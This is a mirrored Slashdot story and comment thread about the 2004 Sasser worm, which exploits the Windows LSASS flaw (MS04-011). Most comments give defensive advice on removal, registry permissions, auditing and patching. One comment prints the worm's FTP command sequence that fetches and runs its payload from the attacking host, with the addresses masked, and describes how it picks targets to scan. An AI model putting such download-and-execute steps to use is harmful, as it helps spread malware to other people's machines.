Slashdot Mirror

← Back to Stories (view on slashdot.org)

New Windows Worm on the Loose

Posted by michael on from the batten-down-your-ports dept.

Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."

7 of 622 comments (clear)

  1. Removal Instructions by modifried · · Score: 5, Informative

    For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

    http://www.microsoft.com/security/incident/sasser. asp

  2. Re:Mutex Trapping by Anonymous Coward · · Score: 5, Informative

    You can set permissions in the registry per key.

    Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run

  3. How it works by mrneutron · · Score: 5, Informative
    It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

    It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):

    open XXX.XXX.XXX.XXX 5554

    anonymous

    user

    bin

    get XXXXX_up.exe

    bye

    XXXXX_up.exe

    If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:

    The IP addresses generated by the worm are distributed as follows:

    50% are completely random

    25% have the same first octet as the IP

    address of the infected host

    25% have the same first and second octet as the IP address of the infected host.

    The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.

    See:

    • http://securityresponse.symantec.com/avcenter/ve nc/data/w32.sasser.worm.html
  4. Re:Mutex Trapping by stef0x77 · · Score: 5, Informative

    Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...

  5. Re:Mutex Trapping by kyhwana · · Score: 5, Informative

    Err, Startup Monitor does just that.
    Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..

    --
    My email addy? should be easy enough.
  6. Re:I Use X Windows by bamf · · Score: 5, Informative

    You've probably already installed it, just look for KB835732 in your list of installed updates.

  7. Re:Mutex Trapping by Foolhardy · · Score: 5, Informative

    You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
    Access attempts will show up in the event viewer.
    Note:use regedt32.exe for Win2000 or eariler. For later versions, regedit.exe does everything (under Edit->Permissions).